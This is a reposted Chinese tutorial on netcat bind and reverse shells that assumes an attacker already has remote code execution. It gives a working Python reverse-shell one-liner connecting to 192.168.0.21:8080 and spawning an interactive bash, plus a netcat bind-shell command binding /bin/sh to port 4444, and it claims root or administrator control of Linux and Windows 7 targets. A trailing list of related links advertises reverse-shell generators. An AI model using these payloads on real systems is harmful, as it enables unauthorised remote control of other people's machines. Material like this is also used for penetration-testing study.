使用netcat的正向 / 反向shell
reverse shell
bind shell
reverse shell描述图:
在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。
先启动攻击端的监听:
再在目标端启动反向shell:
linux
然后可以在攻击端控制目标端的服务器,以root权限;
win7
然后可以在攻击端控制目标端的win7系统,以administrator权限;
python的反向shell:
import os,socket,subprocess; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('192.168.0.21',8080)) #重定向shell输出 os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) #执行子程序 p=subprocess.call(['/bin/bash','-i'])
正向bind Shell
在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下:
使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。
root@kali:~# nc -lvp 4444 -e /bin/sh
listening on [any] 4444 ...
10.1.20.x: inverse host lookup failed: Unknown host
connect to [10.1.20.x] from (UNKNOWN) [10.1.20.x] 6065
root@kali:~# a
转载于:https://www.cnblogs.com/botoo/p/10238785.html
使用netcat的正向 / 反向shell相关推荐
- Shells:一款功能强大的反向Shell快速生成工具
关于Shells Shells是一款功能强大的反向Shell快速生成工具,该工具由4ndr34z负责开发和维护,可以帮助广大研究人员轻松生成常用的反向Shell.如果你需要一种简单的方法来生成格式化的 ...
- python控制摄像头拍照是反的_使用反向Shell控制摄像头
原标题:使用反向Shell控制摄像头 如果你已经用胶条封住了你的网络摄像头,你可能是因为听说过黑客或NSA可以远程监视你.那么问题来了,这些你素未谋面人又是如何远程连接到你的机器并监视你的呢? 这可能 ...
- 谷歌大脑提出对智能体进行「正向-反向」强化学习训练,加速训练过程
原文来源:arXiv 作者:Ashley D. Edwards.Laura Downs.James C. Davidson 「雷克世界」编译:嗯~是阿童木呀.KABUDA.EVA 在强化学习问题中,关 ...
- 使用Android BindingAdapter与InverseBindingAdapter实现SeekBar双向(正向/反向)数据绑定...
使用Android BindingAdapter与InverseBindingAdapter实现SeekBar双向(正向/反向)数据绑定 在我之前写的系列文章中,继续深化Android数据绑定技术的使 ...
- 一款功能强大,可扩展端到端加密反向Shell的工具
关于Mediator Mediator是一款功能强大的可扩展端到端加密反向Shell,该工具基于新型架构实现,采用Python语言开发,能够帮助广大研究人员通过一台"Mediator&quo ...
- 【 Grey Hack 】反向Shell
目录 调查 准备反向shell 反向shell 提权 版本:Grey Hack v0.7.3618 - Alpha 如图,本案例中目标IP尚未开放常见端口 调查 通过路由器获得目标PC的用户邮箱账号和 ...
- JavaScript反向shell
Node.js反向Shell 摘自:http://www.itfang.net/?p=109 如下的Javascript就是一个Node.js的反向连接shell. 这个payload将会生成一个/b ...
- 杂记1:正向反向迭代器,不同stl容器的lower_bound的使用(set,map,vector,arr,pair),数字转字符串
感觉自己记性真的不行,很多之前用过,查过的知识点都忘掉了,开个博客记一下吧. 文章目录 迭代器 lower_bound,upper_bound 可以忽略,我暂时没发现用处 这个比较有用:不同容器的lo ...
- 用python写一个程序控制其它软件_程序员:利用Python实现可控制肉鸡的反向Shell...
一.初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为 Client 主动连接到我们的 Server 端,以实现对多个远程主机的 ...
最新文章
- Java的左移和右移的含义!
- 14Facade(门面)模式
- python with 打开多个文件
- 开关电源怎么测试文波_示波器测试开关电源纹波的方法
- 初学Java,这三个阶段你经历过吗?
- 使用numpy出现DeprecationWarning: The normed argument is ignored when density is provided. 解决方法忽略警告的方法
- 《游戏视频主播手册》——2.2 哪些人适合做游戏主播
- HTML学习笔记--HTML的语法【1】
- 2015蓝桥杯C++A:手链样式(圆排列和环排列)
- thinkphp 3.+ Apache url重写问题(.htaccess)
- docker - 常用命令详解
- Arduino使用NRF24L01模块进行无线通信
- 基于FFmpeg的H265编码器
- 愚人节,你的微信公众号图文排版够愚吗?
- python pygame 动画_pygame行走的小猫多帧动画演示程序
- win10 开机黑屏时间长 联想y470解决方案
- DNS记录类型介绍(A记录、MX记录、NS记录等)
- unity 调整画布大小_使用画布,拖放和File API调整图像大小
- 【EXLIBRIS】纸版书目整理 -- 小书架 上 01 【166 种】【203册】
- 触摸IC XTP2046 驱动笔记